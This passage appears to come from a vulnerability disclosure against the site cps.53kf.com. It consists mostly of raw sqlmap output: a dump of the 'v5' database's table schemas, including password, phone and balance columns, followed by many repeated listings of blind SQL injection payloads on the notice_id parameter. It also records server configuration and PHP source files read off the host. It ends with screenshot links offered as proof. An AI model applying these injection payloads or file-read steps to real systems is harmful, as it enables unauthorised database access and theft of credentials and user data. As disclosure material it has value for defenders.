enum('Y','N','X') | | commits | varchar(10) | | end_time | date | | id | int(11) | | master_name | varchar(20) | | money_type | tinyint(2) | | order_by | varchar(5) | | show_type | varchar(1) | | start_time | date | +-------------+-------------------+ Database: v5 Table: web_user_url [8 columns] +---------------------+--------------+ | Column | Type | +---------------------+--------------+ | baidu_date | date | | baidu_record | varchar(20) | | id | int(10) | | is_first | tinyint(3) | | pr | tinyint(2) | | url | varchar(256) | | user_name | varchar(20) | | web_ad_out_links_id | int(10) | +---------------------+--------------+ Database: v5 Table: ad_count [6 columns] +-----------+-------------+ | Column | Type | +-----------+-------------+ | ad_date | date | | ad_id | int(11) | | ad_ip_num | int(10) | | ad_num | int(10) | | ad_type | varchar(50) | | id | int(11) | +-----------+-------------+ Database: v5 Table: v5_worker [6 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | company_id | int(11) | | id | int(11) | | is_admin | tinyint(4) | | name | varchar(100) | | passwd | varchar(40) | | worker_id | varchar(20) | +------------+--------------+ Database: v5 Table: gggj_ad_old [13 columns] +-------------+-------------------+ | Column | Type | +-------------+-------------------+ | ad_code | text | | ad_content | varchar(50) | | ad_name | varchar(50) | | ad_price | float | | ad_url | text | | add_time | date | | audit | enum('Y','N','X') | | commits | varchar(10) | | end_time | date | | id | int(11) | | master_name | varchar(11) | | money_type | tinyint(2) | | start_time | date | +-------------+-------------------+ Database: v5 Table: v5_agent_oper [30 columns] +----------------+---------------------+ | Column | Type | +----------------+---------------------+ | active_money | float(10,2) | | addr | varchar(150) | | city | varchar(20) | | city_center | tinyint(3) unsigned | | city_discount | float unsigned | | city_name | varchar(30) | | discount | float unsigned | | email | varchar(100) | | fix_money | float(10,2) | | id | int(10) unsigned | | is_zongdai | tinyint(3) unsigned | | kf_name | int(8) | | money | float(10,2) | | msg | tinyint(3) unsigned | | name | varchar(50) | | new_add_money | float(10,2) | | new_add_month | varchar(7) | | oper_name | varchar(20) | | oper_pwd | varchar(50) | | pass | tinyint(3) unsigned | | phone | varchar(50) | | receipt_money | float(10,2) | | reg_date | datetime | | see_agent_user | tinyint(3) | | style_lock | tinyint(3) unsigned | | tm | varchar(50) | | type | tinyint(3) unsigned | | zdygg | tinyint(3) unsigned | | zdylogo | tinyint(3) unsigned | | zongdai_id | int(10) unsigned | +----------------+---------------------+ Database: v5 Table: gggj_adstat [6 columns] +-------------+--------------+ | Column | Type | +-------------+--------------+ | ad_from | tinyint(2) | | ad_id | int(11) | | ad_time | datetime | | com_area | varchar(100) | | com_ip | varchar(20) | | domain_name | varchar(20) | +-------------+--------------+ Database: v5 Table: v5_company_talk_log [5 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | company_id | int(10) | | id | int(10) | | talk_date | datetime | | talk_ip | varchar(15) | | talk_url | varchar(100) | +------------+--------------+ Database: v5 Table: gggj_accountHistory [6 columns] +-------------+-------------+ | Column | Type | +-------------+-------------+ | account | varchar(40) | | add_person | varchar(11) | | add_time | datetime | | domain_name | varchar(50) | | id | int(11) | | moneNum | char(10) | +-------------+-------------+ Database: v5 Table: gggj_account [8 columns] +----------------+---------------+ | Column | Type | +----------------+---------------+ | account | varchar(50) | | account_from | varchar(20) | | account_person | varchar(11) | | account_type | char(10) | | add_time | datetime | | domain_name | varchar(50) | | id | int(11) | | is_select | enum('Y','N') | +----------------+---------------+ Database: v5 Table: out_links [7 columns] +-------------+---------------+ | Column | Type | +-------------+---------------+ | ad_user | varchar(25) | | add_time | datetime | | anchor_text | varchar(128) | | id | int(10) | | pr | tinyint(2) | | web_type | enum('0','1') | | web_url | varchar(50) | +-------------+---------------+ Database: v5 Table: user_infor [17 columns] +--------------+------------------+ | Column | Type | +--------------+------------------+ | baidu_date | date | | baidu_record | varchar(20) | | com_name | varchar(128) | | connect | varchar(40) | | email | varchar(50) | | gm_sum | int(10) | | id | int(20) unsigned | | money | int(10) | | password | varchar(50) | | phone | varchar(20) | | pr | tinyint(2) | | qq | varchar(20) | | reg_sum | int(10) | | type | varchar(2) | | user_level | tinyint(2) | | user_name | varchar(20) | | website | varchar(50) | +--------------+------------------+ Database: v5 Table: cps_commission_log [8 columns] +----------------+------------------+ | Column | Type | +----------------+------------------+ | add_time | datetime | | company_id | int(10) unsigned | | cps_account | varchar(20) | | domain_name | varchar(20) | | id | int(20) | | money | decimal(10,2) | | recharge_money | decimal(10,2) | | remark | varchar(150) | +----------------+------------------+ Database: v5 Table: user_infor_xx [4 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | add_date | datetime | | id | int(20) | | user_id | int(20) | | xx_name | varchar(20) | +----------+-------------+ Database: v5 Table: ad_show [4 columns] +---------+---------+ | Column | Type | +---------+---------+ | ad_dbgg | int(20) | | ad_logo | int(20) | | ad_time | date | | id | int(20) | +---------+---------+ Database: v5 Table: web_ad_out_links [11 columns] +-----------------+-------------------+ | Column | Type | +-----------------+-------------------+ | add_time | datetime | | delete_by | enum('2','1','0') | | delete_time | datetime | | end_time | datetime | | id | int(10) | | money_clearing | datetime | | out_links_id | varchar(10) | | start_time | datetime | | status | enum('0','1','2') | | web_user | varchar(25) | | web_user_url_id | int(10) | +-----------------+-------------------+ Database: v5 Table: sendemail_record [10 columns] +----------+------------------------------+ | Column | Type | +----------+------------------------------+ | addtime | int(11) | | content | varchar(225) | | endtime | int(11) | | mail_id | int(11) | | receiver | varchar(225) | | report | text | | sendtime | int(11) | | status | enum('wait','sending','end') | | title | varchar(225) | | type | enum('1','2','3') | +----------+------------------------------+ Database: v5 Table: mailqueue [9 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | charset | char(4) | | content | mediumtext | | from1 | varchar(100) | | fromname | varchar(255) | | id | int(11) | | reply | varchar(100) | | status | tinyint(4) | | subject | varchar(255) | | to1 | varchar(255) | +----------+--------------+ Database: v5 Table: gggj_master_user [13 columns] +----------+---------------+ | Column | Type | +----------+---------------+ | com_name | varchar(100) | | gg_type | varchar(20) | | id | int(50) | | is_proxy | enum('N','Y') | | mail | varchar(20) | | mobile | varchar(20) | | name | varchar(10) | | pass | char(50) | | person | varchar(20) | | phone | varchar(20) | | remark | text | | type | char(10) | | url | varchar(100) | +----------+---------------+ Database: v5 Table: gggj_config [3 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | config_id | varchar(20) | | config_value | text | | domain_name | varchar(50) | +--------------+-------------+ Database: v5 Table: id_record [3 columns] +-----------+----------+ | Column | Type | +-----------+----------+ | id | int(20) | | last_date | datetime | | last_id | int(10) | +-----------+----------+ Database: v5 Table: v5_company_config [3 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | company_id | int(11) | | config_id | varchar(20) | | config_value | text | +--------------+-------------+ Database: v5 Table: conf_ip1 [6 columns] +----------+---------------------+ | Column | Type | +----------+---------------------+ | area | char(30) | | city | char(30) | | city_cn | char(30) | | end_ip | bigint(20) unsigned | | isp | char(30) | | start_ip | bigint(20) unsigned | +----------+---------------------+ Database: v5 Table: gggj_require [10 columns] +--------------+---------------+ | Column | Type | +--------------+---------------+ | add_date | datetime | | add_fujian | varchar(255) | | add_solution | text | | add_user | int(10) | | audit | enum('Y','N') | | audit_day | datetime | | content | text | | id | int(10) | | master_name | varchar(25) | | title | varchar(50) | +--------------+---------------+ Database: v5 Table: official_adstat [6 columns] +-------------+--------------+ | Column | Type | +-------------+--------------+ | ad_from | tinyint(2) | | ad_id | int(11) | | ad_time | datetime | | com_area | varchar(100) | | com_ip | varchar(20) | | domain_name | varchar(20) | +-------------+--------------+ Database: v5 Table: kf_tuo [8 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | ad_id | int(10) | | ad_type | varchar(10) | | area | varchar(100) | | come_date | datetime | | come_ip | varchar(20) | | come_url | varchar(250) | | id | int(10) | | user_id | int(10) | +-----------+--------------+ Database: v5 Table: ad_show_js [4 columns] +---------+---------+ | Column | Type | +---------+---------+ | ad_dbgg | int(20) | | ad_logo | int(20) | | ad_time | date | | id | int(20) | +---------+---------+ Database: v5 Table: cps_user [13 columns] +-------------------+--------------+ | Column | Type | +-------------------+--------------+ | balance | float(10,2) | | cash_frozen_money | float(10,2) | | company_url | varchar(50) | | contact_name | varchar(50) | | cust_id | varchar(20) | | id | int(20) | | is_checked | tinyint(2) | | is_verified | tinyint(2) | | mobile | varchar(11) | | pwd | varchar(50) | | qq | varchar(11) | | reg_num | int(10) | | user_name | varchar(100) | +-------------------+--------------+ Database: v5 Table: cps_user_account [9 columns] +-------------------+------------------+ | Column | Type | +-------------------+------------------+ | add_time | datetime | | balance | float(10,2) | | cash_frozen_money | float(10,2) | | cust_id | varchar(20) | | exact_io_type | int(10) unsigned | | id | int(20) | | io_remark | text | | io_type | tinyint(2) | | money | float(10,2) | +-------------------+------------------+ Database: v5 Table: gggj_user_config [4 columns] +-------------+-------------+ | Column | Type | +-------------+-------------+ | ad_id | int(11) | | ad_order | int(4) | | ad_pos | int(2) | | domain_name | varchar(50) | +-------------+-------------+ Database: v5 Table: gggj_master_type [2 columns] +---------+-------------+ | Column | Type | +---------+-------------+ | gg_type | varchar(10) | | id | int(10) | +---------+-------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /etc/rc.local file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_etc_rc.local' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /usr/local/apache2/conf/httpd.conf file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_usr_local_apache2_conf_httpd.conf' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/cps/www/union_notice.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_cps_www_union_notice.php' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/cps/www/include/global.php--threads=10 file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/cps/www/include/global.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_cps_www_include_global.php' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/index.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_index.php' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/cps/www/config/cps_config.php file saved to:None sqlmap identified the following injection points with a total of 0 HTTP ### 漏洞证明: [<img src="https://images.seebug.org/upload/201209/29184704653190bd59723b08398c08db947e4c7d.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/29184704653190bd59723b08398c08db947e4c7d.png) [<img src="https://images.seebug.org/upload/201209/29184717050a3199e90a5f4ecd0ab4c5e961d952.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/29184717050a3199e90a5f4ecd0ab4c5e961d952.png)